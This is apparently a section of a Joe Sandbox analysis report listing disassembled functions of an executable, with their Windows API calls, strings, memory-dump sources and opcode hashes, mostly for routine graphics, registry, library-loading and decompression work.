                                                                            • Opcode ID: 7853287eaffac6cb94d744d74196ba731cdf5e518dc0597f07a7724a604def1d
                                                                            • Instruction ID: e79c91264cf403656a7ecb179e9d02605dd9e3cded0af3c011d04f8f5d04b07e
                                                                            • Opcode Fuzzy Hash: 7853287eaffac6cb94d744d74196ba731cdf5e518dc0597f07a7724a604def1d
                                                                            • Instruction Fuzzy Hash: A1318134644644AFD711EF69C88AF9A7BE4AF45308F5580B6FC00AF3A2DB789D40DB49
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00457AD8 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 86libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00457B93
                                                                            Strings
                                                                            • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 00457B9E
                                                                            • CreateAssemblyCache, xrefs: 00457B8A
                                                                            • .NET Framework CreateAssemblyCache function failed, xrefs: 00457BB6
                                                                            • Fusion.dll, xrefs: 00457B33
                                                                            • Failed to load .NET Framework DLL "%s", xrefs: 00457B78
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc
                                                                            • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                            • API String ID: 190572456-3990135632
                                                                            • Opcode ID: 84556e50aacdd0334a8723a64b5ce391b8f5f4a0f005a9f218f2c1a3e260840a
                                                                            • Instruction ID: 54d6081f599df52c860fdc2f47534742524e01ae44f48fc011e119f3f1d07f73
                                                                            • Opcode Fuzzy Hash: 84556e50aacdd0334a8723a64b5ce391b8f5f4a0f005a9f218f2c1a3e260840a
                                                                            • Instruction Fuzzy Hash: FA319A71E04609AFCB11EFA5D88169FB7B8EF44315F50857BE814E7382D7389E088B99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041C0B8 Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0041BFB8: GetObjectA.GDI32(?,00000018), ref: 0041BFC5
                                                                            • GetFocus.USER32 ref: 0041C0D8
                                                                            • 73A0A570.USER32(?), ref: 0041C0E4
                                                                            • 73A08830.GDI32(?,?,00000000,00000000,0041C163,?,?), ref: 0041C105
                                                                            • 73A022A0.GDI32(?,?,?,00000000,00000000,0041C163,?,?), ref: 0041C111
                                                                            • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C128
                                                                            • 73A08830.GDI32(?,00000000,00000000,0041C16A,?,?), ref: 0041C150
                                                                            • 73A0A480.USER32(?,?,0041C16A,?,?), ref: 0041C15D
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: A08830$A022A480A570BitsFocusObject
                                                                            • String ID:
                                                                            • API String ID: 1424713005-0
                                                                            • Opcode ID: 4dda706c4d7f92d041f49e6fbb3e4bdf95359f21a4b7263d3cbf0515cfc8cf41
                                                                            • Instruction ID: be6d8328aec04e85a436dd0cf8ae2147a44d9b66c6d411dca3268b31211d8f12
                                                                            • Opcode Fuzzy Hash: 4dda706c4d7f92d041f49e6fbb3e4bdf95359f21a4b7263d3cbf0515cfc8cf41
                                                                            • Instruction Fuzzy Hash: B2116A71A40618BFDB10DBA9CC86FAFB7FCEF48700F54446AB514E7281D6789D008B68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0047DE80 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0047DF38), ref: 0047DF1D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpen
                                                                            • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                            • API String ID: 47109696-2530820420
                                                                            • Opcode ID: 3d421fe5b9d66a13501841859f0a8451f50d73c39307a227430f230348f08d3b
                                                                            • Instruction ID: 7da821122e4f9b7c3381c3a81ebb3182cabfb864ff3682cb6973b5219dc9143e
                                                                            • Opcode Fuzzy Hash: 3d421fe5b9d66a13501841859f0a8451f50d73c39307a227430f230348f08d3b
                                                                            • Instruction Fuzzy Hash: 65118E30B24204AADB01DB66C802BDF7BB9EF15318F61C0B7F406E7286EB79D9018758
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041B3D2 Relevance: 10.6, APIs: 7, Instructions: 57windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SelectObject.GDI32(00000000,?), ref: 0041B3E0
                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B3EF
                                                                            • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B41B
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041B429
                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B437
                                                                            • DeleteDC.GDI32(00000000), ref: 0041B440
                                                                            • DeleteDC.GDI32(?), ref: 0041B449
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectSelect$Delete$Stretch
                                                                            • String ID:
                                                                            • API String ID: 1458357782-0
                                                                            • Opcode ID: 5d8119482a24acdf9dbc4f71c87d898742faec31f652e860e6f74a5bb4e0366a
                                                                            • Instruction ID: 073f11bba2386bee955988a390c3df6f0cbda7ed7a331810ab0cae2060ca734e
                                                                            • Opcode Fuzzy Hash: 5d8119482a24acdf9dbc4f71c87d898742faec31f652e860e6f74a5bb4e0366a
                                                                            • Instruction Fuzzy Hash: F9114C72E40659ABDF10D6D9D985FAFB3BCEF08704F048456B614FB242C678A8418B54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0048F440 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • 73A0A570.USER32(00000000,?,?,00000000), ref: 0048F451
                                                                              • Part of subcall function 0041A158: CreateFontIndirectA.GDI32(?), ref: 0041A217
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0048F473
                                                                            • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,0048F9C9), ref: 0048F487
                                                                            • GetTextMetricsA.GDI32(00000000,?), ref: 0048F4A9
                                                                            • 73A0A480.USER32(00000000,00000000,0048F4D3,0048F4CC,?,00000000,?,?,00000000), ref: 0048F4C6
                                                                            Strings
                                                                            • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 0048F47E
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                                            • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                            • API String ID: 1435929781-222967699
                                                                            • Opcode ID: aec2ce94ca0a2fe66ea55faeebd29ac8e829e062f1f7dec7e9667981b672f2ca
                                                                            • Instruction ID: 36afa4b657b34b8522d1c231de5a8c505386f3c2143f3af581d88b388b6b6632
                                                                            • Opcode Fuzzy Hash: aec2ce94ca0a2fe66ea55faeebd29ac8e829e062f1f7dec7e9667981b672f2ca
                                                                            • Instruction Fuzzy Hash: BF016575A04608BFEB01EAA5CC41F6FB7ECDB49704F514477B604E7281D6789D008B68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00423304 Relevance: 10.6, APIs: 7, Instructions: 56threadwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCursorPos.USER32 ref: 0042331F
                                                                            • WindowFromPoint.USER32(?,?), ref: 0042332C
                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0042333A
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00423341
                                                                            • SendMessageA.USER32(00000000,00000084,?,?), ref: 0042335A
                                                                            • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423371
                                                                            • SetCursor.USER32(00000000), ref: 00423383
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                            • String ID:
                                                                            • API String ID: 1770779139-0
                                                                            • Opcode ID: 60706cbef7e7fd969e6117079794ea181f59045882c2055e97c618c29bc945ad
                                                                            • Instruction ID: 4e500bdd1cb7c406dcecfc45487f359b17b305850d12e3c552a5b3a09f906ed3
                                                                            • Opcode Fuzzy Hash: 60706cbef7e7fd969e6117079794ea181f59045882c2055e97c618c29bc945ad
                                                                            • Instruction Fuzzy Hash: EC01D4223043103AD620BB795C86E3F26A8CFC5B55F50417FB909BE283DA3D8D0163AD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0048F264 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 0048F274
                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 0048F281
                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0048F28E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                            • API String ID: 667068680-2254406584
                                                                            • Opcode ID: 1e6e599f15a85ca3434ac6dc2256e25d95c130a7a50b60adec5cf6b1919fb023
                                                                            • Instruction ID: 320adb3965b6f495dc5cbca51cbfa6a5691965cf1facb545b0a128d01ebcbff3
                                                                            • Opcode Fuzzy Hash: 1e6e599f15a85ca3434ac6dc2256e25d95c130a7a50b60adec5cf6b1919fb023
                                                                            • Instruction Fuzzy Hash: FBF0CDAAB41B1566D62072B60C82B7F618CCB81770F1408B7BD04A62C2EDAA8D0943BD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00455EB0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00455EE0
                                                                            • GetExitCodeProcess.KERNEL32(?,^%I), ref: 00455F01
                                                                            • CloseHandle.KERNEL32(?,00455F34,?,?,OgE,00000000,00000000), ref: 00455F27
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                            • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects$^%I
                                                                            • API String ID: 2573145106-2465217090
                                                                            • Opcode ID: eae7e9bc5b852605da3e4c9cab9726f535817d301444d626726a3ca8f125a080
                                                                            • Instruction ID: 06bcc0b7b5ae778b55f830a6e63720fcc7028796f4e4f28f42062f96750590e8
                                                                            • Opcode Fuzzy Hash: eae7e9bc5b852605da3e4c9cab9726f535817d301444d626726a3ca8f125a080
                                                                            • Instruction Fuzzy Hash: 3401A271600604AFDB10EB99CC22E2E73A8EB49715F504177F810DB7D3DA3C9D04DA18
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0045B9AC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcAddress.KERNEL32(022E0000,BZ2_bzDecompressInit), ref: 0045B9B5
                                                                            • GetProcAddress.KERNEL32(022E0000,BZ2_bzDecompress), ref: 0045B9C5
                                                                            • GetProcAddress.KERNEL32(022E0000,BZ2_bzDecompressEnd), ref: 0045B9D5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc
                                                                            • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                            • API String ID: 190572456-212574377
                                                                            • Opcode ID: 622227cba5b86ca8fccab1400ad34dc8923e22f3f5578f85d6d1e5fdf3acff14
                                                                            • Instruction ID: bb37bbad0c8d10f251c0aa8c4ec345e64f50a4bb6c8e2d07f97ee2e6ad287d5c
                                                                            • Opcode Fuzzy Hash: 622227cba5b86ca8fccab1400ad34dc8923e22f3f5578f85d6d1e5fdf3acff14
                                                                            • Instruction Fuzzy Hash: A0F012B1600745DEEB14DF77EC41B2626A9E7E8326F14803BD8065936AE37C080ADE5C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0044C070 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(oleacc.dll,?,0044E91D), ref: 0044C07F
                                                                            • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C090
                                                                            • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C0A0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad
                                                                            • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                            • API String ID: 2238633743-1050967733
                                                                            • Opcode ID: b2562950c71cd23530e2a56bc8551780a47537d70dbbb9d9fb25e2bb869be04b
                                                                            • Instruction ID: ac0d725b3ee157e0591d3c5333f5e4ccdb9c4df60658dd2baa23885d1ab8f8cf
                                                                            • Opcode Fuzzy Hash: b2562950c71cd23530e2a56bc8551780a47537d70dbbb9d9fb25e2bb869be04b
                                                                            • Instruction Fuzzy Hash: 82F01270142389CBFBA0EBF5EDC9F123294D3A170DF18517BA0019A2E2C7BD4445CA0D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0042E754 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 20libraryloaderwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0048FAFA,QueryCancelAutoPlay,004929A3), ref: 0042E76A
                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E770
                                                                            • InterlockedExchange.KERNEL32(00494660,00000001), ref: 0042E781
                                                                            • ChangeWindowMessageFilter.USER32(0000C1B5,00000001), ref: 0042E792
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressChangeExchangeFilterHandleInterlockedMessageModuleProcWindow
                                                                            • String ID: ChangeWindowMessageFilter$user32.dll
                                                                            • API String ID: 1365377179-2498399450
                                                                            • Opcode ID: 34d0edbb10ef2500e3b808e5a736a7631458895e216e2905709a8920c88350df
                                                                            • Instruction ID: 4a434d6ebf99a211ad985c76b6619d27f745a5091495b81aefed992397c45a81
                                                                            • Opcode Fuzzy Hash: 34d0edbb10ef2500e3b808e5a736a7631458895e216e2905709a8920c88350df
                                                                            • Instruction Fuzzy Hash: 7BE0ECE1741310EAEAA0BBA2FC8AF5A399497E5719F50003BF104651E2C6BD0C41C91C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00473B70 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 14libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00492999), ref: 00473B76
                                                                            • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00473B83
                                                                            • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00473B93
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                            • API String ID: 667068680-222143506
                                                                            • Opcode ID: 315d5260c9f678ade1a0cc40628bf4d981144f5db400e838a2cc1962c1f8332f
                                                                            • Instruction ID: dcc6af067bf3078790d87b20fbc0612a0ccff274e7f94df7ba8b603e8e0053f1
                                                                            • Opcode Fuzzy Hash: 315d5260c9f678ade1a0cc40628bf4d981144f5db400e838a2cc1962c1f8332f
                                                                            • Instruction Fuzzy Hash: 89C012F0241700EDDA10AFF15CC2D7A2148E540B2A720817BF448791C7D67C6E055A1D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041B5DC Relevance: 9.1, APIs: 6, Instructions: 144windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFocus.USER32 ref: 0041B6B5
                                                                            • 73A0A570.USER32(?), ref: 0041B6C1
                                                                            • 73A08830.GDI32(00000000,?,00000000,00000000,0041B78C,?,?), ref: 0041B6F6
                                                                            • 73A022A0.GDI32(00000000,00000000,?,00000000,00000000,0041B78C,?,?), ref: 0041B702
                                                                            • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B76A,?,00000000,0041B78C,?,?), ref: 0041B730
                                                                            • 73A08830.GDI32(00000000,00000000,00000000,0041B771,?,?,00000000,00000000,0041B76A,?,00000000,0041B78C,?,?), ref: 0041B764
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: A08830$A022A16310A570Focus
                                                                            • String ID:
                                                                            • API String ID: 3731147114-0
                                                                            • Opcode ID: 8ecdb598e1a4996df05dfcc0867a12236d6d7e85a0aef6664a328bbccf7dd41e
                                                                            • Instruction ID: 06dd750ffd38faa4806619bbf82afcbb6c92213719a6bc319da55d16d67b79f4
                                                                            • Opcode Fuzzy Hash: 8ecdb598e1a4996df05dfcc0867a12236d6d7e85a0aef6664a328bbccf7dd41e
                                                                            • Instruction Fuzzy Hash: 8E512C70A00609AFDF11DFA9C895AEEBBB8FF49704F104466F510A7390D7789981CBA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041B8AC Relevance: 9.1, APIs: 6, Instructions: 142windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFocus.USER32 ref: 0041B987
                                                                            • 73A0A570.USER32(?), ref: 0041B993
                                                                            • 73A08830.GDI32(00000000,?,00000000,00000000,0041BA59,?,?), ref: 0041B9CD
                                                                            • 73A022A0.GDI32(00000000,00000000,?,00000000,00000000,0041BA59,?,?), ref: 0041B9D9
                                                                            • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BA37,?,00000000,0041BA59,?,?), ref: 0041B9FD
                                                                            • 73A08830.GDI32(00000000,00000000,00000000,0041BA3E,?,?,00000000,00000000,0041BA37,?,00000000,0041BA59,?,?), ref: 0041BA31
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: A08830$A022A16310A570Focus
                                                                            • String ID:
                                                                            • API String ID: 3731147114-0
                                                                            • Opcode ID: d652c417c9a8b03d43389ce1c345903e188ace57285e6eb171d305152e46db0d
                                                                            • Instruction ID: 49b1e422d63778e1935042bf56866254f806bc58ba08b8974fd4ee1451f7b7cb
                                                                            • Opcode Fuzzy Hash: d652c417c9a8b03d43389ce1c345903e188ace57285e6eb171d305152e46db0d
                                                                            • Instruction Fuzzy Hash: 4F512B74A006089FCB11DFA9C895AAEBBF9FF48700F118066F904EB750D7389D40CBA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041B478 Relevance: 9.1, APIs: 6, Instructions: 113windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFocus.USER32 ref: 0041B4EE
                                                                            • 73A0A570.USER32(?,00000000,0041B5C8,?,?,?,?), ref: 0041B4FA
                                                                            • 73A14620.GDI32(?,00000068,00000000,0041B59C,?,?,00000000,0041B5C8,?,?,?,?), ref: 0041B516
                                                                            • 73A3E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B59C,?,?,00000000,0041B5C8,?,?,?,?), ref: 0041B533
                                                                            • 73A3E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B59C,?,?,00000000,0041B5C8), ref: 0041B54A
                                                                            • 73A0A480.USER32(?,?,0041B5A3,?,?), ref: 0041B596
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: E680$A14620A480A570Focus
                                                                            • String ID:
                                                                            • API String ID: 932946509-0
                                                                            • Opcode ID: 4a4a7d32ada1a740a668c755e1a66010c357d4bec648edb4ace877a09f191135
                                                                            • Instruction ID: a6e4b16520c9e4bc630ca31e265eea6a5194191570467489af8bdb357d288b52
                                                                            • Opcode Fuzzy Hash: 4a4a7d32ada1a740a668c755e1a66010c357d4bec648edb4ace877a09f191135
                                                                            • Instruction Fuzzy Hash: 2D41C571A04254AFDF10DFA9C885AAFBBB5EF49704F1484AAE900E7351D2389D10CBA5
